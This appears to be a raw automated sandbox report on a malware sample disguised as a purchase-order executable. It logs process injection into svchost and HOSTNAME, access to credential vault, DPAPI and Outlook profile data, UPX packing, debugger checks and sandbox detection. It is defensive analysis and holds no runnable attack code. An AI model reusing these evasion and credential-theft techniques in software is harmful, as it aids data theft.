Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	Process created: C:\Windows\SysWOW64\HOSTNAME.EXE "C:\Windows\SysWOW64\HOSTNAME.EXE"
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe"	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	Process created: C:\Windows\SysWOW64\HOSTNAME.EXE "C:\Windows\SysWOW64\HOSTNAME.EXE"	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\HOSTNAME.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\HOSTNAME.EXE

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source:	Binary string: hostname.pdbGCTL source: svchost.exe, 00000001.00000002.1491377865.0000000002A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1491352144.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, BXuFUjm0ZHK4rIZvDMH.exe, 00000009.00000002.3620267073.0000000000D7E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: hostname.pdb source: svchost.exe, 00000001.00000002.1491377865.0000000002A19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1491352144.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, BXuFUjm0ZHK4rIZvDMH.exe, 00000009.00000002.3620267073.0000000000D7E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: PURCHASE ORDER N0259305-06SN.exe, 00000000.00000003.1183753498.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, PURCHASE ORDER N0259305-06SN.exe, 00000000.00000003.1168849173.0000000003BA0000.00000004.00001000.00020000.00000000.sdmp, PURCHASE ORDER N0259305-06SN.exe, 00000000.00000003.1171692440.0000000003BA0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1492005218.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1390553819.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1392560160.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1492005218.0000000003100000.00000040.00001000.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000A.00000002.3621024167.0000000003150000.00000040.00001000.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000A.00000003.1491224419.0000000002DE2000.00000004.00000020.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000A.00000002.3621024167.00000000032EE000.00000040.00001000.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000A.00000003.1493998684.0000000002F9C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: PURCHASE ORDER N0259305-06SN.exe, 00000000.00000003.1183753498.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, PURCHASE ORDER N0259305-06SN.exe, 00000000.00000003.1168849173.0000000003BA0000.00000004.00001000.00020000.00000000.sdmp, PURCHASE ORDER N0259305-06SN.exe, 00000000.00000003.1171692440.0000000003BA0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1492005218.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1390553819.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1392560160.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1492005218.0000000003100000.00000040.00001000.00020000.00000000.sdmp, HOSTNAME.EXE, HOSTNAME.EXE, 0000000A.00000002.3621024167.0000000003150000.00000040.00001000.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000A.00000003.1491224419.0000000002DE2000.00000004.00000020.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000A.00000002.3621024167.00000000032EE000.00000040.00001000.00020000.00000000.sdmp, HOSTNAME.EXE, 0000000A.00000003.1493998684.0000000002F9C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: HOSTNAME.EXE, 0000000A.00000002.3621377097.000000000377C000.00000004.10000000.00040000.00000000.sdmp, HOSTNAME.EXE, 0000000A.00000002.3619793906.0000000002CEF000.00000004.00000020.00020000.00000000.sdmp, BXuFUjm0ZHK4rIZvDMH.exe, 0000000B.00000002.3621067937.0000000002C8C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1793932992.000000001DD5C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: HOSTNAME.EXE, 0000000A.00000002.3621377097.000000000377C000.00000004.10000000.00040000.00000000.sdmp, HOSTNAME.EXE, 0000000A.00000002.3619793906.0000000002CEF000.00000004.00000020.00020000.00000000.sdmp, BXuFUjm0ZHK4rIZvDMH.exe, 0000000B.00000002.3621067937.0000000002C8C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1793932992.000000001DD5C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: BXuFUjm0ZHK4rIZvDMH.exe, 00000009.00000000.1409614520.000000000070F000.00000002.00000001.01000000.00000007.sdmp, BXuFUjm0ZHK4rIZvDMH.exe, 0000000B.00000000.1561086163.000000000070F000.00000002.00000001.01000000.00000007.sdmp

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00E80A10 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,

0_2_00E80A10

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00D78945 push ecx; ret	0_2_00D78958
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00416964 push esi; retf	1_2_00416971
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040AA65 push FFFFFFF5h; iretd	1_2_0040AA6E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00403270 push eax; ret	1_2_00403272
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00414A0D pushfd ; iretd	1_2_00414A77
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00418AC8 push 0000004Eh; iretd	1_2_00418AE6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00418B00 push 0000004Eh; iretd	1_2_00418AE6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004083C6 push esi; iretd	1_2_004083C4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041839D push ds; iretd	1_2_004183ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004083AF push esi; iretd	1_2_004083C4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041EC5F push eax; retf	1_2_0041ECB6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041B469 push cs; iretd	1_2_0041B46A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041EC8B push eax; retf	1_2_0041ECB6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00417CA7 push ds; iretd	1_2_00417CB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00405D97 push 849D4F26h; retf	1_2_00405DA2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004146DF pushfd ; retf	1_2_0041470D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041EEA3 push esp; ret	1_2_0041EEA5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0310225F pushad ; ret	1_2_031027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031027FA pushad ; ret	1_2_031027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031309AD push ecx; mov dword ptr [esp], ecx	1_2_031309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0310283D push eax; iretd	1_2_03102858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0310135E push eax; iretd	1_2_03101369
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0315225F pushad ; ret	10_2_031527F9
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031527FA pushad ; ret	10_2_031527F9
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_031809AD push ecx; mov dword ptr [esp], ecx	10_2_031809B6
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0315283D push eax; iretd	10_2_03152858
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_03151368 push eax; iretd	10_2_03151369
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_008881F6 push cs; iretd	10_2_008881F7
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_008828EC pushfd ; ret	10_2_008828ED
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_00884A34 push ds; iretd	10_2_00884A3D
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_00872B24 push 849D4F26h; retf	10_2_00872B2F

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00D548D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00D548D7
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DD5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00DD5376

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00D73187 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00D73187

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	API/Special instruction interceptor: Address: 155EF34
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	API/Special instruction interceptor: Address: 7FFCC372D324
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	API/Special instruction interceptor: Address: 7FFCC372D7E4
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	API/Special instruction interceptor: Address: 7FFCC372D944
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	API/Special instruction interceptor: Address: 7FFCC372D504
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	API/Special instruction interceptor: Address: 7FFCC372D544
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	API/Special instruction interceptor: Address: 7FFCC372D1E4
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	API/Special instruction interceptor: Address: 7FFCC3730154
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	API/Special instruction interceptor: Address: 7FFCC372DA44

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: PURCHASE ORDER N0259305-06SN.exe, 00000000.00000003.1157962917.0000000001546000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER N0259305-06SN.exe, 00000000.00000002.1185746659.0000000001572000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER N0259305-06SN.exe, 00000000.00000003.1158318837.0000000001572000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER N0259305-06SN.exe, 00000000.00000003.1158029347.0000000001572000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER N0259305-06SN.exe, 00000000.00000003.1162063087.0000000001562000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER N0259305-06SN.exe, 00000000.00000003.1167762184.0000000001563000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER N0259305-06SN.exe, 00000000.00000003.1158398936.0000000001572000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER N0259305-06SN.exe, 00000000.00000003.1161407184.0000000001572000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: PROCMON.EXE

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_0317096E rdtsc

1_2_0317096E

Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Window / User API: threadDelayed 3933			Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Window / User API: threadDelayed 6040			Jump to behavior

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-105475

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	API coverage: 4.4 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	API coverage: 2.6 %

Source: C:\Windows\SysWOW64\HOSTNAME.EXE TID: 2328	Thread sleep count: 3933 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE TID: 2328	Thread sleep time: -7866000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE TID: 2328	Thread sleep count: 6040 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE TID: 2328	Thread sleep time: -12080000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe TID: 7700	Thread sleep time: -70000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe TID: 7700	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe TID: 7700	Thread sleep time: -35000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe TID: 7700	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Program Files (x86)\mTEXGEiGuKbHYERsWoWvpZVpzvrsenNaFzzoDEmrSkHNNnNunLlRyEnvxIMUhehWobpDUuaaSBQN\BXuFUjm0ZHK4rIZvDMH.exe TID: 7700	Thread sleep time: -48000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Last function: Thread delayed
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Last function: Thread delayed

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DB445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00DB445A
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DBC6D1 FindFirstFileW,FindClose,	0_2_00DBC6D1
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DBC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00DBC75C
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DBEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00DBEF95
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DBF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00DBF0F2
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DBF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00DBF3F3
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DB37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00DB37EF
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DB3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00DB3B12
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_00DBBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00DBBCBC
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Code function: 10_2_0088CAC0 FindFirstFileW,FindNextFileW,FindClose,	10_2_0088CAC0

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00D549A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00D549A0

Source: BXuFUjm0ZHK4rIZvDMH.exe, 0000000B.00000002.3620541797.0000000000EF9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
Source: HOSTNAME.EXE, 0000000A.00000002.3619793906.0000000002CEF000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000C.00000002.1795346892.000002195DD2C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\HOSTNAME.EXE	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_0317096E rdtsc

1_2_0317096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_00417CB3 LdrLoadDll,

1_2_00417CB3

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00DC3F09 BlockInput,

0_2_00DC3F09

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00D53B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00D53B3A

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00D85A7C RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,

0_2_00D85A7C

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe

Code function: 0_2_00E80A10 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,

0_2_00E80A10

Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0155F1A0 mov eax, dword ptr fs:[00000030h]	0_2_0155F1A0
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0155F200 mov eax, dword ptr fs:[00000030h]	0_2_0155F200
Source: C:\Users\user\Desktop\PURCHASE ORDER N0259305-06SN.exe	Code function: 0_2_0155DB30 mov eax, dword ptr fs:[00000030h]	0_2_0155DB30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312C310 mov ecx, dword ptr fs:[00000030h]	1_2_0312C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03208324 mov eax, dword ptr fs:[00000030h]	1_2_03208324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03208324 mov ecx, dword ptr fs:[00000030h]	1_2_03208324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03208324 mov eax, dword ptr fs:[00000030h]	1_2_03208324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03208324 mov eax, dword ptr fs:[00000030h]	1_2_03208324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03150310 mov ecx, dword ptr fs:[00000030h]	1_2_03150310
